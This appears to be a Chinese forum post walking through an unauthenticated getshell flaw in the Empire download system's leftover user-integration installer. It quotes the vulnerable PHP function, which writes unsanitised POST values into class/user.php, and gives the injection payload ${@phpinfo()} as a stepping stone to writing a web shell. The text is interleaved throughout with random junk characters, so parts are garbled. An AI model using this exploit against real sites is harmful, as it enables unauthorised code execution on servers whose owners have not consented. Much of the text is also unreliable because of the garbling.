这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
. D! @1 l7 | a( t) E1 u
4 z9 S0 v+ J' B, }: ^& Y& S
5 @8 q: O) o) W' u( Y* \这是帝国的一套下载系统 如图. V0 q3 p5 Z) x$ P/ I
ps(不需要任何账户和密码,直接写shell) ) t1 C, c- ^7 E h( r6 H- z! A
由于很多站是由于下载要整合discuz 等等一些论坛....
+ ?5 u+ [3 a2 _0 s {; e4 J 2 i" q% w5 b L1 Y; @7 S
而帝国他又有一个万能接口,如图 " a4 W- b2 ]' j1 y
/ a$ Q+ V7 l* @3 L0 T
3 @% ] h( e4 E而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
s+ V# u, N- g5 e9 J7 t/ H
6 t, E! i/ o/ h- C8 c当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
9 _+ }4 U/ w4 ^# Y
/ r c: P# A8 v在data/fun.php中的15行# e8 ]8 k. Y& y* |
6 d, u. E1 U c" R" i" E
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {
1 `" a, W8 x' G+ Z17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干/ X* v9 g+ ]5 [* @ n! K
1 Y0 Y% d# P ]; f这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
9 Y9 O$ J* Q; v% K6 |5 F& h5 U, p6 i9 p$ X8 U; Z
他将传进来的变量进行了切割,然后赋给了$filetext
& h% t* r9 n5 C! U$ t$ _
0 ^/ p4 C) [6 w$ Y5 v& _9 f7 e% x然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了9 [4 w$ o& L1 z/ q: i
z- I& K, N4 R3 A& T6 K5 @+ }我们看看写入的结果,随便填一个
5 I; |, h# C7 |( N8 A- e
4 f' e% D( U7 {9 I; h' {( `- N4 p. F4 B \! P- V" K9 A
6 _6 U7 y$ K. v! M9 D9 N8 |$ i7 S/ M. A2 L( y# ?( z! ?
6 w4 t/ L3 w& b7 |3 n
9 B8 g; f" m: b/ T: C+ g
; A: W6 f5 D; A9 W! d6 j& u* O2 D- [: B! ^ n" i) z1 ^
4 Z( X* K% g g- @. O" }) J4 |; o: q+ j2 ?2 Z
( h* l" s; c5 B% }5 W0 k) u
( P8 s, D" X# _
0 m( d% `" d+ C/ b
4 J0 ^2 G7 [; U0 W. k$ o. R L6 R/ d7 }8 J. g) p
2 f8 |, X2 G7 Z3 [. D* u
: U( C+ ~& E5 `% m
) b# z1 o# p) @/ K i) E1 ]2 j# o0 {% F: b5 y! z' {4 X
, }# a5 f/ D @3 d+ W/ t, P, ]
k0 l* r) n7 {: {
所以我们淫荡点,写个${@phpinfo()}试试
: O8 J% m; n* D/ K然后访问以下class/user.php这个文件' x/ c) L# k% B5 R- s
日了吧
8 I; S. k8 l- i: W: t
" F3 P7 }/ j. P2 l2 x0 j, s% w) {* f4 }* h/ ?# T! o7 {3 I
$ U% R7 B/ L& j, X) T# T/ K# G
9 j' v6 Y2 D4 U. T; a$ v# `& S) M: P$ y7 k/ k* T8 h- c
|